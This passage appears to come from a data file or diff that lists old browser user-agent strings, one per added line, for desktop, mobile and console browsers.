like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.3.3; en-us ; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1/UCBrowser/8.6.1.262/145/355 +Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1 +Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 
3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true +Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true +Mozilla/5.0 (Linux; U; Android 4.1; en-us; sdk Build/MR1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 +Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 +Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 
Firefox/4.0b6pre Camino/2.2a1pre +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20120813 Firefox/16.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML like Gecko) Version/6.0.2 Safari/536.26.17 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.31 (KHTML like Gecko) Chrome/26.0.1410.63 Safari/537.31 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) 
Gecko/20090624 Firefox/3.5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 Silk-Accelerated=true +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4736.0 Safari/537.36 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941 +Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) 
Gecko/2008092414 Firefox/3.0.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 +Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 +Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 +Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 +Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 +Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 +Mozilla/5.0 (PLAYSTATION 3; 1.10) +Mozilla/5.0 (PLAYSTATION 3; 2.00) +Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ +Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba +Mozilla/5.0 (Symbian/3; 
Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 +Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 
Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0 +Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 +Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525 +Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2 +Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 +Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.29 Safari/537.36 OPR/15.0.1147.24 (Edition Next) +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) 
Chrome/13.0.782.24 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML like Gecko) Maxthon/4.0.0.2000 Chrome/22.0.1229.79 Safari/537.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.12 Safari/537.36 OPR/14.0.1116.4 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 OPR/19.0.1326.56 +Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20120422 Firefox/12.0 SeaMonkey/2.9 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 +Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3 +Mozilla/5.0 
(Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/16.0 Firefox/16.0 +Mozilla/5.0 (Windows NT 6.2; rv:19.0) Gecko/20121129 Firefox/19.0 +Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 +Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36 OPR/18.0.1284.49 +Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0 +Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax) +Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2 +Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) 
Version/5.0.1 Safari/533.17.8 +Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: ) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 +Mozilla/5.0 (Windows; U; Windows NT 6.2; es-US ) AppleWebKit/540.0 (KHTML like Gecko) Version/6.0 Safari/8900.00 +Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a +Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 +Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/536.5 (KHTML like Gecko) Chrome/19.0.1084.56 Safari/536.5 +Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 +Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) 
Konqueror/4.8 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36 +Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1 +Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 +Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 +Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre +Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (X11; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (X11; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 +Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 +Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2 +Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 +Mozilla/5.0 (X11; Linux x86_64) 
